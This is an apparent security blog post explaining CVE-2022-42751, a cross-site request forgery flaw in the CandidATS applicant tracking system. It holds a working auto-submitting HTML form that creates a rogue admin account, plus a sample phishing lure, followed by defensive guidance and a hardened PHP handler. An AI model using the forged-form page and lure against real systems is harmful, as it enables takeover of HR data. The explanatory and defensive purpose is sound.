CVE-2022-42751 affects CandidATS, an open-source applicant tracking system (ATS) used by HR teams to manage job applications. This post breaks down how an attacker can escalate privileges through a CSRF weakness in version 3.., what the impact is, how the exploit works (with code), and where to find the original advisories and resources.
What Is CVE-2022-42751?
CVE-2022-42751 is a Cross-Site Request Forgery (CSRF) vulnerability in CandidATS version 3... Because the application does not protect sensitive state-changing actions with anti-CSRF tokens, an attacker who can get a logged-in administrator to load a page they control can make the admin's browser submit changes (such as creating a new administrator account) without the admin's knowledge.
Primary sources: the official CVE entry, the Packet Storm advisory and the Exploit-DB entry (all linked under References below).
Why Is This Dangerous?
An attacker sends a crafted link to a logged-in CandidATS admin. If the admin opens it, the attacker's page silently submits a form that creates a new admin user inside the victim's session. The attacker can then log in with full rights: viewing, modifying, even deleting sensitive HR data. The victim does not have to do anything beyond loading the page; there is no confirmation step to alert them.
1. No CSRF Protection
When the form that creates a new user is submitted, CandidATS does not check for an anti-CSRF token (nor the request's Origin/Referer header). It simply processes whatever data arrives together with a valid session cookie. For a high-privilege action such as user creation that is a serious gap: the session cookie proves which browser is talking, not that the user intended the request.
2. Attacker Prepares Malicious HTML
The attacker makes a small web page with a hidden form or uses JavaScript to submit a cross-site request. Here’s what the attacker’s code might look like:
<!-- malicious.html: attacker-controlled page with an auto-submitting cross-site form -->
<html>
<body>
<!-- Target path and field names are illustrative; the real ones come from the advisory -->
<form action="http://candidats.example.com/admin/adduser.php" method="POST" id="csrfForm">
<input type="hidden" name="username" value="eviladmin" />
<input type="hidden" name="password" value="SuperStrongPass123" />
<input type="hidden" name="email" value="attacker@example.com" />
<input type="hidden" name="role" value="admin" />
<!-- Add any other fields the real form requires for admin creation -->
</form>
<script>
// Submit as soon as the page loads; the victim's browser attaches its CandidATS session cookie
document.getElementById('csrfForm').submit();
</script>
<h2>If you see this, your HR system is vulnerable!</h2>
</body>
</html>
3. Social Engineering
The attacker now just needs the victim admin to visit malicious.html while they're logged into CandidATS. For example, the attacker could send a phishing email:
> Hi,
> We received your resume submission. To see your candidate profile, click here.
When the admin opens the link, the browser sends the admin's session cookie along with the POST to candidats.example.com, and the server processes the form as if the admin had filled it out themselves. This only works because the cookie is attached to a cross-site POST: a session cookie set with SameSite=Lax or SameSite=Strict would not be sent, which is why the cookie attribute is a useful second line of defense even though it is not a substitute for tokens.
4. Attacker Logs In
The attacker now signs in with the credentials planted by the forged request:
Username: eviladmin
Password: SuperStrongPass123
If the application is still vulnerable, the login succeeds with full admin privileges.
How Can You Protect Against This?
- Patch: check whether a fixed version of CandidATS is available (official site: https://candidats.org/) and upgrade.
- Use CSRF Tokens: every form that performs a state-changing action must carry a unique, unguessable anti-CSRF token bound to the user's session, and the server must reject the request when the token is missing or does not match. Compare tokens in constant time.
- Set SameSite on the session cookie: SameSite=Lax (or Strict) stops the browser attaching the cookie to cross-site POSTs, defeating the auto-submitting form above even before the token check runs.
- Check Origin/Referer: reject privileged requests whose Origin (or Referer) header names a different site. This is defense in depth, not a replacement for tokens, since some deployments strip Referer.
- Reduce exposure: restrict the admin panel to trusted networks or a VPN so an attacker cannot reach it even with a forged request.
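The token and origin checks described above, and the unchecked handler described under "No CSRF Protection", side by side as an added example. This is not CandidATS code: it assumes a PHP handler at /admin/adduser.php with the field names used in the malicious page, a hypothetical create_user() stub standing in for the application's real user-creation logic, and an HTTPS deployment.

```php
<?php
// Added example, not CandidATS code: synchronizer-token CSRF protection for a
// privileged "add user" handler. The path /admin/adduser.php, the field names
// and create_user() are assumed for illustration and do not come from the advisory.
declare(strict_types=1);

// Harden the session cookie itself: SameSite=Lax stops the browser attaching it
// to a cross-site POST, which on its own defeats an auto-submitting form.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,   // assumes the site is served over HTTPS
    'samesite' => 'Lax',
]);
session_start();

/** Return the per-session CSRF token, minting one on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 256 bits from a CSPRNG
    }
    return $_SESSION['csrf_token'];
}

/** Constant-time comparison so an attacker cannot learn the token byte by byte. */
function csrf_valid(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

/** Defense in depth: a request whose Origin (or, failing that, Referer) names another host is cross-site. */
function same_origin(string $expectedHost): bool
{
    $source = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    return parse_url($source, PHP_URL_HOST) === $expectedHost;
}

/** Hypothetical stub for the application's real user-creation logic. */
function create_user(string $username, string $password, string $email, string $role): void
{
    // ... insert into the users table with a properly hashed password (not shown) ...
}

// The vulnerable pattern the page describes: anything arriving with a valid
// session cookie is accepted, so a forged cross-site POST creates the account.
//   if ($_SERVER['REQUEST_METHOD'] === 'POST') {
//       create_user($_POST['username'], $_POST['password'], $_POST['email'], $_POST['role']);
//   }

// Hardened handler: reject before touching any state.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!same_origin('candidats.example.com') || !csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Request rejected: cross-site origin or missing/invalid CSRF token.');
    }
    create_user(
        $_POST['username'] ?? '',
        $_POST['password'] ?? '',
        $_POST['email'] ?? '',
        $_POST['role'] ?? 'user'
    );
    header('Location: /admin/users.php'); // assumed redirect target
    exit;
}
?>
<!-- The legitimate form carries the token. The attacker's page cannot read it:
     it exists only in this response and in the victim's server-side session. -->
<form method="POST" action="/admin/adduser.php">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input name="username"> <input name="password" type="password">
  <input name="email" type="email">
  <select name="role"><option value="user">user</option><option value="admin">admin</option></select>
  <button type="submit">Create user</button>
</form>
```

The token check is the primary control; the Origin/Referer check and the SameSite cookie are layers behind it. If your deployment sits behind a proxy or referrer policy that strips both headers, same_origin() as written will reject legitimate requests, so relax it to fail only when a header is present and names a foreign host, and rely on the token for the rest.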
References
- CVE-2022-42751 @ NVD
- Exploit-DB: 51158
- Packet Storm Security CVE Advisory
- CandidATS GitHub
Conclusion
CVE-2022-42751 is simple but powerful. Any application managing sensitive data must use CSRF protection for high-privilege actions. If you run CandidATS 3.., patch immediately or restrict access to the admin panel—your data depends on it!
If you want hands-on help or have questions about securing your applicant tracking system, reach out to your IT team or relevant open-source community.
Timeline
Published on: 11/03/2022 18:15:00 UTC
Last modified on: 11/04/2022 15:12:00 UTC